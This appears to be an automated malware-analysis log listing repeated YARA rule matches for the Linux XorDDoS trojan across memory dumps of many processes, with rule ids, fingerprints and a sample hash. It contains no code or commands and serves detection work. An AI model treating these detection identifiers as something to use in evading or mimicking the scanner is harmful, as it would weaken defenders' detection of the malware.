        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
